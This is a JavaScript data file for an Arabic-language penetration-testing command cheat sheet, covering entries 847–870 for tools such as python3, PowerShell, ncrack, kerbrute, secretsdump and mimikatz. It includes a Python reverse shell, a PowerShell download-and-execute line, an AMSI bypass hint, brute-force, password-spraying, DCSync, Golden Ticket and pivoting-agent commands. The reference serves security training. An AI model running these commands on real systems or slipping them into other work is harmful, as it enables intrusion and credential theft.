// ─── SCRIPTING & AUTOMATION ───────────────────────────────────
{
  id: 847, name: 'python3', cat: 'scripting', level: 'intermediate',
  syntax: 'python3 [OPTIONS] script.py',
  short: 'لغة Python لأتمتة مهام الأمن',
  desc: `Python أقوى لغة للأتمتة في مجال الأمن السيبراني. تُستخدم في: Exploit Development، Web Scraping، Network Programming، Malware Analysis، كتابة أدوات مخصصة.`,
  options: [
    { flag: '-c "CODE"', desc: 'تشغيل كود مباشرة' },
    { flag: '-m MODULE', desc: 'تشغيل Module مباشرة' },
    { flag: '-i', desc: 'وضع تفاعلي بعد التشغيل' },
  ],
  examples: [
    { cmd: 'python3 -c "import socket; s=socket.socket(); s.connect((\'IP\',4444)); import pty; pty.spawn(\'/bin/bash\')"', desc: 'Reverse Shell' },
    { cmd: 'python3 -m http.server 8080', desc: 'خادم HTTP سريع لنقل الملفات' },
    { cmd: 'python3 -c "import hashlib; print(hashlib.md5(b\'password\').hexdigest())"', desc: 'حساب MD5' },
    { cmd: 'python3 -c "import requests; r=requests.get(\'http://target.com\'); print(r.status_code)"', desc: 'HTTP Request' },
  ],
  tips: '💡 pip3 install requests scapy pwntools impacket للأدوات الأمنية.',
  related: ['bash', 'ruby', 'powershell'],
},
{
  id: 848, name: 'bash-scripting', cat: 'scripting', level: 'intermediate',
  syntax: 'bash script.sh',
  short: 'Bash للأتمتة في سطر الأوامر',
  desc: `Bash Scripting أساسي في الأمن السيبراني لأتمتة: فحص الشبكات، معالجة النتائج، تشغيل أدوات متسلسلة، إنشاء Backdoors بسيطة.`,
  options: [
    { flag: '-x', desc: 'Debug Mode (يطبع كل أمر)' },
    { flag: '-e', desc: 'توقف عند أول خطأ' },
    { flag: '-n', desc: 'التحقق من الـ Syntax بدون تشغيل' },
  ],
  examples: [
    { cmd: 'for ip in $(seq 1 254); do ping -c1 192.168.1.$ip &>/dev/null && echo "192.168.1.$ip is UP"; done', desc: 'Ping Sweep' },
    { cmd: 'while read pass; do echo -n "$pass: "; echo "$pass" | su -c "id" user 2>/dev/null; done < rockyou.txt', desc: 'Password Testing' },
    { cmd: 'curl -s http://target.com/page?id={1..100} | grep -i "admin\\|password"', desc: 'IDOR Testing' },
    { cmd: 'nmap -sV target.com | grep "open" | awk \'{print $1,$3}\'', desc: 'استخراج المنافذ المفتوحة' },
  ],
  tips: '💡 set -euo pipefail في بداية الـ Script للحماية من الأخطاء.',
  related: ['python3', 'powershell', 'expect'],
},
{
  id: 849, name: 'powershell', cat: 'scripting', level: 'intermediate',
  syntax: 'powershell [OPTIONS] -Command "CMD"',
  short: 'PowerShell لاختبار Windows',
  desc: `PowerShell قوي جداً في اختبار Windows وAD. يُستخدم في Post-Exploitation وAD Enumeration وBypass لـ Security Controls. يعمل على Linux/macOS أيضاً.`,
  options: [
    { flag: '-ExecutionPolicy Bypass', desc: 'تجاوز سياسة التشغيل' },
    { flag: '-NonInteractive', desc: 'بدون تفاعل' },
    { flag: '-WindowStyle Hidden', desc: 'بدون نافذة' },
    { flag: '-EncodedCommand', desc: 'تشغيل Base64 Command' },
  ],
  examples: [
    { cmd: 'powershell -ExecutionPolicy Bypass -File script.ps1', desc: 'تشغيل Script' },
    { cmd: 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(\'http://IP/script.ps1\')"', desc: 'Fileless Execution' },
    { cmd: 'powershell -c "Get-ADUser -Filter * | Select Name,SamAccountName"', desc: 'تعداد AD Users' },
    { cmd: 'powershell -c "Get-Process | Sort-Object CPU -Descending | Select -First 20"', desc: 'أكثر العمليات استهلاكاً' },
  ],
  tips: '💡 AMSI Bypass مطلوب في بيئات محمية: [Ref].Assembly.GetType(...).GetField(...)',
  related: ['python3', 'bash', 'empire'],
},
{
  id: 850, name: 'tmux', cat: 'linux', level: 'intermediate',
  syntax: 'tmux [OPTIONS]',
  short: 'مُحاكي Terminal متعدد الجلسات',
  desc: `Tmux مُحاكي Terminal يتيح فتح جلسات متعددة في Terminal واحد، تقسيم الشاشة، والإبقاء على الجلسات حية بعد قطع الاتصال. أساسي في اختبارات الاختراق.`,
  options: [
    { flag: 'new -s NAME', desc: 'إنشاء جلسة جديدة' },
    { flag: 'attach -t NAME', desc: 'الاتصال بجلسة موجودة' },
    { flag: 'ls', desc: 'عرض الجلسات' },
    { flag: 'Ctrl+B %', desc: 'تقسيم أفقي' },
    { flag: 'Ctrl+B "', desc: 'تقسيم عمودي' },
    { flag: 'Ctrl+B d', desc: 'فصل الجلسة' },
  ],
  examples: [
    { cmd: 'tmux new -s pentest', desc: 'إنشاء جلسة اختبار اختراق' },
    { cmd: 'tmux attach -t pentest', desc: 'العودة للجلسة' },
    { cmd: 'tmux new-window -n nmap', desc: 'نافذة جديدة لـ Nmap' },
    { cmd: 'tmux split-window -h', desc: 'تقسيم أفقي' },
  ],
  tips: '💡 استخدم Ctrl+B d للفصل والعودة لاحقاً بـ tmux attach.',
  related: ['screen', 'byobu', 'terminal'],
},

// ─── ADDITIONAL COMMANDS (51-100) ────────────────────────────
{
  id: 851, name: 'ncrack', cat: 'password', level: 'intermediate',
  syntax: 'ncrack [OPTIONS] target',
  short: 'Brute Force شبكي سريع متوازٍ',
  desc: `Ncrack أداة Brute Force شبكية سريعة من Nmap team. تدعم RDP وSSH وFTP وTelnet وHTTP وPOP3 وSMB. مصممة للسرعة مع عمليات متوازية عالية.`,
  options: [
    { flag: '-U users.txt -P passwords.txt', desc: 'قوائم المستخدمين وكلمات المرور' },
    { flag: '-p PORT', desc: 'المنفذ المستهدف' },
    { flag: '--rate=10', desc: 'معدل المحاولات في الثانية' },
  ],
  examples: [
    { cmd: 'ncrack -U users.txt -P rockyou.txt rdp://192.168.1.10', desc: 'Brute Force RDP' },
    { cmd: 'ncrack -p 22 -U users.txt -P pass.txt 192.168.1.0/24', desc: 'Brute Force SSH لشبكة' },
    { cmd: 'ncrack -v --user admin -P rockyou.txt ftp://target.com', desc: 'FTP مع تفاصيل' },
  ],
  tips: '💡 أسرع من Hydra لـ RDP. استخدم --rate للتحكم في السرعة.',
  related: ['hydra', 'medusa', 'hashcat'],
},
{
  id: 852, name: 'sslscan', cat: 'network', level: 'intermediate',
  syntax: 'sslscan [OPTIONS] HOST',
  short: 'فحص إعدادات SSL/TLS',
  desc: `SSLScan يفحص خوادم SSL/TLS ويكشف: البروتوكولات المدعومة، Cipher Suites الضعيفة، شهادات منتهية الصلاحية، Heartbleed، POODLE.`,
  options: [
    { flag: '--tls10 --tls11', desc: 'فحص TLS 1.0 و1.1' },
    { flag: '--show-certificate', desc: 'عرض تفاصيل الشهادة' },
    { flag: '--xml=FILE', desc: 'حفظ بصيغة XML' },
    { flag: '--no-failed', desc: 'إخفاء Ciphers الفاشلة' },
  ],
  examples: [
    { cmd: 'sslscan target.com', desc: 'فحص SSL أساسي' },
    { cmd: 'sslscan --show-certificate target.com:443', desc: 'مع تفاصيل الشهادة' },
    { cmd: 'sslscan --tls10 --tls11 target.com', desc: 'فحص بروتوكولات قديمة' },
    { cmd: 'sslscan --xml=report.xml target.com', desc: 'حفظ تقرير XML' },
  ],
  tips: '💡 اجمعه مع testssl.sh للفحص الأكثر شمولاً.',
  related: ['testssl.sh', 'openssl', 'nmap'],
},
{
  id: 853, name: 'testssl.sh', cat: 'network', level: 'intermediate',
  syntax: 'bash testssl.sh [OPTIONS] URI',
  short: 'فحص شامل لـ TLS/SSL',
  desc: `testssl.sh السكريبت الأشمل لفحص TLS/SSL. يفحص كل جوانب TLS: البروتوكولات، Ciphers، الشهادة، الثغرات المعروفة (Heartbleed, POODLE, BEAST, CRIME).`,
  options: [
    { flag: '--full', desc: 'فحص شامل كامل' },
    { flag: '--heartbleed', desc: 'فحص Heartbleed فقط' },
    { flag: '--severity HIGH', desc: 'عرض نتائج HIGH فقط' },
    { flag: '--html', desc: 'تقرير HTML' },
    { flag: '-e', desc: 'فحص كل Cipher Suites' },
  ],
  examples: [
    { cmd: 'bash testssl.sh https://target.com', desc: 'فحص أساسي' },
    { cmd: 'bash testssl.sh --full https://target.com', desc: 'فحص شامل' },
    { cmd: 'bash testssl.sh --heartbleed --poodle https://target.com', desc: 'ثغرات محددة' },
    { cmd: 'bash testssl.sh --severity HIGH --html report.html https://target.com', desc: 'تقرير HTML' },
  ],
  tips: '💡 git clone https://github.com/drwetter/testssl.sh للحصول على أحدث إصدار.',
  related: ['sslscan', 'openssl', 'nmap'],
},
{
  id: 854, name: 'enum4linux-ng', cat: 'network', level: 'intermediate',
  syntax: 'enum4linux-ng [OPTIONS] TARGET',
  short: 'تعداد معلومات Windows/Samba',
  desc: `enum4linux-ng نسخة محسّنة من enum4linux مكتوبة بـ Python3. تُعدّد: المستخدمون، المجموعات، المشاركات، سياسة كلمات المرور، معلومات الـ Domain.`,
  options: [
    { flag: '-A', desc: 'فحص شامل' },
    { flag: '-U', desc: 'تعداد المستخدمين' },
    { flag: '-S', desc: 'تعداد المشاركات' },
    { flag: '-P', desc: 'سياسة كلمات المرور' },
    { flag: '-u user -p pass', desc: 'مع مصادقة' },
  ],
  examples: [
    { cmd: 'enum4linux-ng -A 192.168.1.10', desc: 'فحص شامل' },
    { cmd: 'enum4linux-ng -U 192.168.1.10', desc: 'تعداد المستخدمين فقط' },
    { cmd: 'enum4linux-ng -A -u admin -p pass 192.168.1.10', desc: 'مع مصادقة' },
    { cmd: 'enum4linux-ng -A 192.168.1.10 > enum_results.txt', desc: 'حفظ النتائج' },
  ],
  tips: '💡 ابدأ بدون مصادقة لاكتشاف Anonymous Access.',
  related: ['crackmapexec', 'smbmap', 'rpcclient'],
},
{
  id: 855, name: 'dnsrecon', cat: 'recon', level: 'intermediate',
  syntax: 'dnsrecon -d DOMAIN [OPTIONS]',
  short: 'استطلاع DNS الشامل',
  desc: `DNSRecon أداة Python شاملة للاستطلاع DNS: Zone Transfer، تعداد Subdomains، فحص Records، Reverse Lookup، Wild-card Detection.`,
  options: [
    { flag: '-d DOMAIN', desc: 'النطاق الهدف' },
    { flag: '-t axfr', desc: 'محاولة Zone Transfer' },
    { flag: '-t brt', desc: 'Brute Force للـ Subdomains' },
    { flag: '-D FILE', desc: 'قائمة Subdomains للاختبار' },
    { flag: '-x FILE', desc: 'حفظ بصيغة XML' },
  ],
  examples: [
    { cmd: 'dnsrecon -d target.com', desc: 'استطلاع أساسي' },
    { cmd: 'dnsrecon -d target.com -t axfr', desc: 'Zone Transfer' },
    { cmd: 'dnsrecon -d target.com -t brt -D subdomains.txt', desc: 'Brute Force Subdomains' },
    { cmd: 'dnsrecon -d target.com -x dns_results.xml', desc: 'حفظ XML' },
  ],
  tips: '💡 Zone Transfer يكشف كل DNS Records إذا نجح.',
  related: ['dnsx', 'fierce', 'dig'],
},
{
  id: 856, name: 'kerbrute-enum', cat: 'exploitation', level: 'advanced',
  syntax: 'kerbrute userenum -d DOMAIN users.txt',
  short: 'تعداد مستخدمي Active Directory',
  desc: `Kerbrute يعدّد المستخدمين في Active Directory عبر Kerberos Pre-Auth. أهدأ من LDAP لأنه لا يُنشئ Logon Events. يُستخدم أيضاً في Password Spraying.`,
  options: [
    { flag: 'userenum', desc: 'تعداد المستخدمين' },
    { flag: '-d DOMAIN', desc: 'اسم النطاق' },
    { flag: '--dc DC_IP', desc: 'IP الـ Domain Controller' },
    { flag: '-o FILE', desc: 'حفظ النتائج' },
    { flag: '-t 10', desc: 'عدد الخيوط' },
  ],
  examples: [
    { cmd: 'kerbrute userenum -d corp.local --dc 192.168.1.10 users.txt', desc: 'تعداد المستخدمين' },
    { cmd: 'kerbrute userenum -d corp.local --dc 192.168.1.10 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt', desc: 'مع قائمة كبيرة' },
    { cmd: 'kerbrute passwordspray -d corp.local --dc 192.168.1.10 users.txt "Welcome2024!"', desc: 'Password Spraying' },
  ],
  tips: '⚠️ Password Spraying: استخدم كلمة مرور واحدة فقط لتجنب قفل الحسابات.',
  related: ['bloodhound-python', 'impacket', 'ldapsearch'],
},
{
  id: 857, name: 'smbmap', cat: 'network', level: 'intermediate',
  syntax: 'smbmap -H TARGET [OPTIONS]',
  short: 'تعداد مشاركات SMB وصلاحياتها',
  desc: `SMBMap يُعدّد مشاركات SMB ويفحص صلاحيات القراءة/الكتابة. يُظهر بوضوح ما يمكن الوصول إليه بالمستخدم الحالي.`,
  options: [
    { flag: '-H HOST', desc: 'IP الهدف' },
    { flag: '-u user -p pass', desc: 'بيانات المصادقة' },
    { flag: '-d DOMAIN', desc: 'النطاق' },
    { flag: '-R SHARE', desc: 'عرض محتوى مشاركة' },
    { flag: '--download FILE', desc: 'تنزيل ملف' },
  ],
  examples: [
    { cmd: 'smbmap -H 192.168.1.10', desc: 'Anonymous SMB Enum' },
    { cmd: 'smbmap -H 192.168.1.10 -u admin -p password', desc: 'مع مصادقة' },
    { cmd: 'smbmap -H 192.168.1.10 -u admin -p pass -R C$', desc: 'تصفح C$' },
    { cmd: 'smbmap -H 192.168.1.0/24 -u admin -p pass', desc: 'فحص شبكة كاملة' },
  ],
  tips: '💡 جرّب Anonymous أولاً (بدون -u -p) لاكتشاف المشاركات المفتوحة.',
  related: ['smbclient', 'crackmapexec', 'enum4linux'],
},
{
  id: 858, name: 'netexec', cat: 'exploitation', level: 'advanced',
  syntax: 'netexec smb TARGET [OPTIONS]',
  short: 'الخليفة الرسمي لـ CrackMapExec',
  desc: `NetExec (nxc) الخليفة الرسمي والمحسّن لـ CrackMapExec. يدعم SMB/LDAP/WinRM/SSH/FTP/RDP مع تحسينات كثيرة. نفس الأوامر مع أداء أفضل.`,
  options: [
    { flag: 'smb TARGET', desc: 'فحص عبر SMB' },
    { flag: 'ldap TARGET', desc: 'فحص عبر LDAP' },
    { flag: '-u USER -p PASS', desc: 'بيانات المصادقة' },
    { flag: '--shares', desc: 'تعداد المشاركات' },
    { flag: '--sam', desc: 'استخراج SAM Database' },
  ],
  examples: [
    { cmd: 'netexec smb 192.168.1.0/24', desc: 'اكتشاف Windows Hosts' },
    { cmd: 'netexec smb TARGET -u admin -p pass --shares', desc: 'تعداد المشاركات' },
    { cmd: 'netexec smb TARGET -u admin -p pass -x "whoami"', desc: 'تنفيذ أمر' },
    { cmd: 'netexec ldap TARGET -u admin -p pass --users', desc: 'تعداد AD Users' },
  ],
  tips: '💡 pip install netexec للتثبيت. مشابه تماماً لـ CrackMapExec.',
  related: ['crackmapexec', 'impacket', 'bloodhound-python'],
},
{
  id: 859, name: 'snmpwalk', cat: 'network', level: 'intermediate',
  syntax: 'snmpwalk -v2c -c public TARGET',
  short: 'تعداد معلومات SNMP',
  desc: `snmpwalk يجمع معلومات من أجهزة SNMP: اسم الجهاز، نظام التشغيل، الواجهات الشبكية، العمليات، قرص التخزين. Community String "public" افتراضي لكثير من الأجهزة.`,
  options: [
    { flag: '-v1 / -v2c / -v3', desc: 'نسخة SNMP' },
    { flag: '-c COMMUNITY', desc: 'Community String' },
    { flag: '-O n', desc: 'عرض OID رقمي' },
    { flag: '1.3.6.1.2.1.1.1', desc: 'sysDescr OID' },
  ],
  examples: [
    { cmd: 'snmpwalk -v2c -c public 192.168.1.10', desc: 'تعداد كامل' },
    { cmd: 'snmpwalk -v2c -c public 192.168.1.10 1.3.6.1.2.1.25.4.2', desc: 'قائمة العمليات' },
    { cmd: 'snmp-check 192.168.1.10 -c public', desc: 'تقرير أسهل للقراءة' },
    { cmd: 'onesixtyone -c community.txt 192.168.1.0/24', desc: 'Brute Force Community String' },
  ],
  tips: '💡 جرّب community strings: public, private, community, admin, manager.',
  related: ['snmp-check', 'onesixtyone', 'nmap'],
},
{
  id: 860, name: 'ipmitool', cat: 'network', level: 'advanced',
  syntax: 'ipmitool -I lanplus -H HOST -U USER -P PASS',
  short: 'اختبار أمان IPMI/BMC',
  desc: `ipmitool يتفاعل مع واجهات IPMI/BMC للخوادم. ثغرة IPMI Cipher 0 تتيح الوصول بدون مصادقة. يُستخدم في اختبار البنية التحتية المؤسسية.`,
  options: [
    { flag: '-I lanplus', desc: 'استخدام IPMI over LAN' },
    { flag: '-H HOST', desc: 'عنوان الـ BMC' },
    { flag: '-C 0', desc: 'Cipher 0 (بدون مصادقة)' },
    { flag: 'user list', desc: 'قائمة المستخدمين' },
  ],
  examples: [
    { cmd: 'nmap -p 623 -sU 192.168.1.0/24', desc: 'اكتشاف IPMI Hosts' },
    { cmd: 'ipmitool -I lanplus -H 192.168.1.10 -U admin -P password chassis status', desc: 'حالة الخادم' },
    { cmd: 'ipmitool -I lanplus -H 192.168.1.10 -C 0 -U "" user list', desc: 'Cipher 0 Attack' },
    { cmd: 'msfconsole -q -x "use auxiliary/scanner/ipmi/ipmi_dumphashes; set RHOSTS 192.168.1.0/24; run"', desc: 'استخراج Hashes عبر MSF' },
  ],
  tips: '⚠️ Cipher 0 ثغرة خطيرة. كثير من الخوادم الافتراضية معرّضة لها.',
  related: ['nmap', 'msfconsole', 'hashcat'],
},
{
  id: 861, name: 'sublist3r', cat: 'recon', level: 'beginner',
  syntax: 'sublist3r -d DOMAIN',
  short: 'اكتشاف النطاقات الفرعية من مصادر متعددة',
  desc: `Sublist3r يجمع Subdomains من محركات بحث متعددة: Google، Yahoo، Bing، Baidu، Ask، Virustotal. سريع وسهل للمبتدئين.`,
  options: [
    { flag: '-d DOMAIN', desc: 'النطاق الهدف' },
    { flag: '-o FILE', desc: 'حفظ النتائج' },
    { flag: '-b', desc: 'Brute Force إضافي' },
    { flag: '-t 10', desc: 'عدد الخيوط' },
    { flag: '-e google,yahoo', desc: 'محركات بحث محددة' },
  ],
  examples: [
    { cmd: 'sublist3r -d target.com', desc: 'اكتشاف Subdomains' },
    { cmd: 'sublist3r -d target.com -o subs.txt', desc: 'حفظ النتائج' },
    { cmd: 'sublist3r -d target.com -b -w wordlist.txt', desc: 'مع Brute Force' },
  ],
  tips: '💡 استخدم Subfinder وAmass للحصول على نتائج أكثر.',
  related: ['subfinder', 'amass', 'dnsx'],
},
{
  id: 862, name: 'wafw00f', cat: 'webapp', level: 'beginner',
  syntax: 'wafw00f URL',
  short: 'كشف Web Application Firewalls',
  desc: `WAFW00F يكتشف ويُعرّف الـ WAFs المستخدمة في موقع ويب. يدعم اكتشاف 150+ WAF مختلف. مفيد قبل اختبار WAF Bypass.`,
  options: [
    { flag: '-a', desc: 'اختبار كل الـ WAFs' },
    { flag: '-r', desc: 'رأس/ذيل عشوائي' },
    { flag: '-l', desc: 'قائمة الـ WAFs المدعومة' },
    { flag: '-o FILE', desc: 'حفظ النتائج' },
  ],
  examples: [
    { cmd: 'wafw00f https://target.com', desc: 'كشف WAF' },
    { cmd: 'wafw00f https://target.com -a', desc: 'اختبار كل الـ WAFs' },
    { cmd: 'wafw00f -l | grep -i "cloudflare\\|akamai"', desc: 'WAFs الشهيرة' },
    { cmd: 'cat urls.txt | xargs -I{} wafw00f {}', desc: 'فحص قائمة URLs' },
  ],
  tips: '💡 إذا كُشف Cloudflare، جرّب إيجاد IP الأصلي بـ Shodan.',
  related: ['nmap', 'sqlmap', 'burpsuite'],
},
{
  id: 863, name: 'joomscan', cat: 'webapp', level: 'beginner',
  syntax: 'perl joomscan.pl -u URL',
  short: 'فحص ثغرات مواقع Joomla',
  desc: `JoomScan أداة OWASP لفحص مواقع Joomla. تكتشف: الإصدار، القوالب المثبتة، الإضافات الضعيفة، المسارات الحساسة.`,
  options: [
    { flag: '-u URL', desc: 'عنوان موقع Joomla' },
    { flag: '--ec', desc: 'تعداد المكونات' },
    { flag: '-a AGENT', desc: 'User-Agent مخصص' },
    { flag: '-r', desc: 'تقرير HTML' },
  ],
  examples: [
    { cmd: 'joomscan -u http://target.com', desc: 'فحص Joomla' },
    { cmd: 'joomscan -u http://target.com --ec', desc: 'مع تعداد Components' },
    { cmd: 'joomscan -u http://target.com -r', desc: 'مع تقرير HTML' },
  ],
  tips: '💡 استخدم CMSmap للكشف التلقائي عن نوع CMS أولاً.',
  related: ['wpscan', 'nikto', 'burpsuite'],
},
{
  id: 864, name: 'wpscan', cat: 'webapp', level: 'beginner',
  syntax: 'wpscan --url URL [OPTIONS]',
  short: 'فحص ثغرات مواقع WordPress',
  desc: `WPScan فاحص WordPress الأشهر. يكتشف: الإصدار، القوالب والإضافات الضعيفة، المستخدمين، كلمات المرور الضعيفة، ملفات مكشوفة.`,
  options: [
    { flag: '--url URL', desc: 'عنوان موقع WordPress' },
    { flag: '--enumerate u', desc: 'تعداد المستخدمين' },
    { flag: '--enumerate p', desc: 'تعداد الإضافات' },
    { flag: '--passwords FILE', desc: 'Brute Force كلمات المرور' },
    { flag: '--api-token TOKEN', desc: 'API Key لنتائج أكثر' },
  ],
  examples: [
    { cmd: 'wpscan --url http://target.com', desc: 'فحص WordPress' },
    { cmd: 'wpscan --url http://target.com --enumerate u', desc: 'اكتشاف المستخدمين' },
    { cmd: 'wpscan --url http://target.com --enumerate vp', desc: 'الإضافات الضعيفة' },
    { cmd: 'wpscan --url http://target.com -U admin -P rockyou.txt', desc: 'Brute Force كلمة المرور' },
  ],
  tips: '💡 سجّل في wpscan.com للحصول على API Token ونتائج CVEs.',
  related: ['joomscan', 'nikto', 'burpsuite'],
},
{
  id: 865, name: 'metasploit-aux', cat: 'exploitation', level: 'intermediate',
  syntax: 'use auxiliary/MODULE',
  short: 'وحدات Metasploit المساعدة للاستطلاع',
  desc: `Metasploit Auxiliary Modules تُستخدم للاستطلاع والفحص بدون استغلال: فحص SSH، SMB، HTTP، قواعد البيانات، Brute Force، تعداد الخدمات.`,
  options: [
    { flag: 'use auxiliary/scanner/ssh/ssh_login', desc: 'Brute Force SSH' },
    { flag: 'use auxiliary/scanner/smb/smb_login', desc: 'Brute Force SMB' },
    { flag: 'use auxiliary/scanner/http/dir_scanner', desc: 'Directory Scan' },
    { flag: 'use auxiliary/scanner/mssql/mssql_login', desc: 'Brute Force MSSQL' },
  ],
  examples: [
    { cmd: 'use auxiliary/scanner/portscan/tcp\nset RHOSTS 192.168.1.0/24\nrun', desc: 'Port Scan بـ Metasploit' },
    { cmd: 'use auxiliary/scanner/ssh/ssh_login\nset RHOSTS 192.168.1.10\nset USER_FILE users.txt\nset PASS_FILE rockyou.txt\nrun', desc: 'SSH Brute Force' },
    { cmd: 'use auxiliary/scanner/smb/smb_ms17_010\nset RHOSTS 192.168.1.0/24\nrun', desc: 'فحص EternalBlue' },
    { cmd: 'use auxiliary/scanner/http/title\nset RHOSTS 192.168.1.0/24\nset PORTS 80,443,8080\nrun', desc: 'عناوين الصفحات الرئيسية' },
  ],
  tips: '💡 show options بعد use MODULE لرؤية كل الإعدادات المطلوبة.',
  related: ['msfconsole', 'nmap', 'crackmapexec'],
},
{
  id: 866, name: 'tcpflow', cat: 'network', level: 'intermediate',
  syntax: 'tcpflow [OPTIONS] -r PCAP',
  short: 'استخراج وإعادة تجميع جلسات TCP',
  desc: `tcpflow يعيد تجميع جلسات TCP من ملفات pcap. يُنشئ ملفاً لكل جلسة بما فيها المحتوى الكامل. مفيد لاستخراج HTTP Requests أو ملفات من حركة الشبكة.`,
  options: [
    { flag: '-r FILE', desc: 'قراءة من ملف pcap' },
    { flag: '-i INTERFACE', desc: 'التقاط مباشر' },
    { flag: '-o DIR', desc: 'مجلد الناتج' },
    { flag: '-C', desc: 'طباعة مباشرة بدون حفظ' },
  ],
  examples: [
    { cmd: 'tcpflow -r capture.pcap -o /output/', desc: 'استخراج الجلسات' },
    { cmd: 'tcpflow -r capture.pcap port 80 -o /http/', desc: 'جلسات HTTP فقط' },
    { cmd: 'sudo tcpflow -i eth0 -C port 21', desc: 'التقاط FTP مباشرة' },
    { cmd: 'tcpflow -r cap.pcap | grep -i "password\\|pass\\|user"', desc: 'البحث عن credentials' },
  ],
  tips: '💡 NetworkMiner بديل رسومي ممتاز لاستخراج الملفات من pcap.',
  related: ['wireshark', 'tcpdump', 'NetworkMiner'],
},
{
  id: 867, name: 'impacket-secretsdump', cat: 'exploitation', level: 'advanced',
  syntax: 'impacket-secretsdump domain/user:pass@TARGET',
  short: 'استخراج كل هاشات كلمات المرور',
  desc: `impacket-secretsdump يستخرج جميع هاشات كلمات المرور من: SAM، SECURITY، SYSTEM، LSA Secrets، DPAPI، وعبر DCSync من Domain Controller.`,
  options: [
    { flag: 'domain/user:pass@TARGET', desc: 'مصادقة بكلمة مرور' },
    { flag: '-hashes LM:NTLM', desc: 'مصادقة بالهاش' },
    { flag: '-just-dc', desc: 'DCSync فقط' },
    { flag: '-just-dc-user USER', desc: 'DCSync لمستخدم محدد' },
  ],
  examples: [
    { cmd: 'impacket-secretsdump corp.local/admin:pass@192.168.1.10', desc: 'استخراج كامل' },
    { cmd: 'impacket-secretsdump -hashes :NTLM corp.local/admin@DC_IP', desc: 'Pass-the-Hash' },
    { cmd: 'impacket-secretsdump corp.local/admin:pass@DC_IP -just-dc', desc: 'DCSync فقط' },
    { cmd: 'impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL', desc: 'من ملفات محفوظة' },
  ],
  tips: '💡 DCSync يحتاج Domain Admin أو صلاحيات Replication.',
  related: ['mimikatz', 'crackmapexec', 'hashcat'],
},
{
  id: 868, name: 'ligolo-ng', cat: 'network', level: 'advanced',
  syntax: '# Proxy: ./proxy -selfcert\n# Agent: ./agent -connect IP:11601 -ignore-cert',
  short: 'Pivoting متقدم بـ Interface شبكي حقيقي',
  desc: `Ligolo-ng أداة Go حديثة للـ Pivoting تُنشئ TUN Interface للشبكة الداخلية. أسرع وأسهل من Proxychains. تُغني عن إعداد Routes يدوياً.`,
  options: [
    { flag: '-selfcert', desc: 'شهادة TLS ذاتية التوقيع' },
    { flag: '-laddr 0.0.0.0:PORT', desc: 'منفذ الـ Server' },
    { flag: '-connect IP:PORT', desc: 'اتصال الـ Agent بالـ Server' },
    { flag: '-ignore-cert', desc: 'تجاهل التحقق من الشهادة' },
  ],
  examples: [
    { cmd: 'sudo ip tuntap add user kali mode tun ligolo && sudo ip link set ligolo up', desc: 'إعداد TUN Interface' },
    { cmd: './proxy -selfcert -laddr 0.0.0.0:11601', desc: 'تشغيل Server (المهاجم)' },
    { cmd: './agent -connect ATTACKER_IP:11601 -ignore-cert', desc: 'تشغيل Agent (الضحية)' },
    { cmd: 'sudo ip route add 10.10.10.0/24 dev ligolo', desc: 'إضافة Route للشبكة الداخلية' },
  ],
  tips: '💡 لا يحتاج Proxychains - كل الأدوات تصل للشبكة الداخلية مباشرة.',
  related: ['chisel', 'proxychains', 'socat'],
},
{
  id: 869, name: 'openvas', cat: 'scanning', level: 'intermediate',
  syntax: '# Web: https://localhost:9392',
  short: 'فاحص الثغرات المؤسسي المفتوح',
  desc: `OpenVAS (Greenbone Vulnerability Scanner) فاحص ثغرات مفتوح المصدر للمؤسسات. يفحص شبكات كاملة ويُصنّف الثغرات بـ CVSS. قاعدة بيانات تحتوي 80,000+ اختبار.`,
  options: [
    { flag: 'gvm-start', desc: 'تشغيل OpenVAS' },
    { flag: 'gvm-stop', desc: 'إيقاف OpenVAS' },
    { flag: 'gvm-check-setup', desc: 'التحقق من الإعداد' },
    { flag: 'gvmd --create-user admin', desc: 'إنشاء مستخدم' },
  ],
  examples: [
    { cmd: 'sudo apt install gvm -y && sudo gvm-setup', desc: 'التثبيت والإعداد' },
    { cmd: 'sudo gvm-start', desc: 'تشغيل OpenVAS' },
    { cmd: '# Web: https://127.0.0.1:9392', desc: 'فتح الواجهة الرسومية' },
    { cmd: 'gvm-check-setup', desc: 'التحقق من صحة الإعداد' },
  ],
  tips: '💡 التثبيت الأول يستغرق 30+ دقيقة لتنزيل قاعدة البيانات.',
  related: ['nessus', 'nuclei', 'nmap'],
},
{
  id: 870, name: 'mimikatz-kerberos', cat: 'exploitation', level: 'advanced',
  syntax: 'kerberos::list /export',
  short: 'استخراج وحقن Kerberos Tickets',
  desc: `Mimikatz Kerberos Module يستخرج ويُحقن Kerberos Tickets. يُستخدم في Pass-the-Ticket، Overpass-the-Hash، Golden Ticket، Silver Ticket Attacks.`,
  options: [
    { flag: 'kerberos::list', desc: 'قائمة الـ Tickets الحالية' },
    { flag: 'kerberos::list /export', desc: 'تصدير Tickets' },
    { flag: 'kerberos::ptt ticket.kirbi', desc: 'حقن Ticket' },
    { flag: 'kerberos::golden', desc: 'إنشاء Golden Ticket' },
  ],
  examples: [
    { cmd: 'privilege::debug\nkerberos::list /export', desc: 'تصدير Tickets' },
    { cmd: 'kerberos::ptt ticket.kirbi', desc: 'Pass-the-Ticket' },
    { cmd: 'kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:HASH /ptt', desc: 'Golden Ticket' },
    { cmd: 'sekurlsa::tickets /export', desc: 'تصدير من LSA' },
  ],
  tips: '⚠️ Golden Ticket يبقى صالحاً 10 سنوات بشكل افتراضي حتى بعد تغيير كلمة المرور.',
  related: ['mimikatz', 'rubeus', 'impacket'],
},
]; // END CMD_PART8

// Export
window.CMD_PART8 = CMD_PART8;
console.log(`✅ CMD_PART8 Loaded: ${CMD_PART8.length} commands`);

// Export
window.CMD_PART8 = CMD_PART8;
console.log(`✅ CMD_PART8 Loaded: ${CMD_PART8.length} commands`);
